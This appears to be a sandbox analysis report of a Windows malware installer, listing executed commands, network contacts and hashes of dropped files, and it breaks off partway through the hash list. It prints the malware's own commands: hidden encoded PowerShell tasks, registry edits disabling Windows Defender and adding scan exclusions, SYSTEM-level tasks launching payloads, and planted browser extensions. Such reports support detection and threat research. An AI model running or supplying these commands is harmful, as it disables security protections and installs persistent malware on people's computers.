schtasks /CREATE /TN "gkKMmQgXg" /SC once /ST 00:03:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkKMmQgXg"

C:\Windows\system32\taskeng.exe

taskeng.exe {8FE753B0-39C2-4C39-A5ED-536B633FE5D4} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkKMmQgXg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe\" sw /site_id 525403 /S" /V1 /F

C:\Windows\system32\taskeng.exe

taskeng.exe {9103196B-3CC5-4FC9-AF42-89FFB994145D} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gzPWurHjf" /SC once /ST 00:52:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gzPWurHjf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gzPWurHjf"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXCerFuzY" /SC once /ST 01:06:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXCerFuzY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXCerFuzY"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdKDdoLpI" /SC once /ST 02:03:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdKDdoLpI"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdKDdoLpI"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 04:01:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\AOatCp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\OUuKJjg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 03:03:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.193.91:80 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:80 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 151.101.193.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp

Files

\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/2180-22-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/2996-30-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2996-31-0x0000000002870000-0x0000000002878000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7529a79259636185d4468d1bec57870f
SHA1 4d232d8eff99033ca425727f4b98a0270ed8f380
SHA256 3d4f53362464eff91425a20dbdad317ccf1ae42e9f2537f278d7e97852f3f8c4
SHA512 ea60111c254ea0cd6884ac351f3f511f448abd8b6ad4088012ea8a491cee7d78bce73e4dbfe100cf8da6527e70c3cfd92fc90fc25704fb96eec0afa0866e4c77

memory/1468-48-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1468-49-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6d0b361337bc68e57b2ff781882abec6
SHA1 fc037af9d5eeb4473cbd332ee9d28afc1d50f0e9
SHA256 044cd8942b58287dd8f7f03bfc12ce1ba22ad639d72194ccd5f48503c1751ccd
SHA512 a0c921f4027f64990a90334f06f1dbc421248f950631ad93ebc06157cfb9a93e48e034648b9c96e1784244d4f41bf1df82743a5ead955bfe898a61ba4fb79100

memory/1780-58-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1780-59-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf

MD5 e6000d40f93cfd9836319346c7b8512f
SHA1 2f9ea5d2ae5c8ea7d0248a3f2cbbe67d3c7d70ad
SHA256 446b88189f9d340d2eefd6750d912d251510f77c24ec46e7f9db5d0d95bb6466
SHA512 f516c957ec0c470367a83892fd911f3b3b6ca520ecbe3f9d37b2db1953ea7d5d150ea0a726703d8a2e7c1224e716a484ff552ce26a71d6c1b3352b99377eda85

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a90bf1087aabbe4472fdbca96477dbd7
SHA1 e75f30364d3b14ea4c428825f7bc0ee4307b1a93
SHA256 8cd2644ee7bd8fb7ae2a4f63dcad1331c41cb4cb3d132cf85449636fb33cb1c7
SHA512 90a62f0b9f44b565b99032942340edc2db3ad550ab4e7ec546eb94847d09a01174ad633f200288229b8e64821fd2b470775718554596ebc2f77faa3e09c4c79d

memory/1608-87-0x00000000033B0000-0x0000000003435000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 d70324dba90f00b784bc3b97da5047cd
SHA1 eda42ff5c32976d2c5416419d12f664f6422e0b8
SHA256 432e74ca4319c4b1a1523a5355cf01675859a80aca5e22dfb65e06cc439c3780
SHA512 0f4039287b5b1a70ee469f987a533f1079a8b89c173026fe3086e891bdde55b3c4b76e3ffdee44bebb94bb44af90a79a199c5a2d180a2564139797a0a24c573b

memory/1608-122-0x00000000036F0000-0x000000000375B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
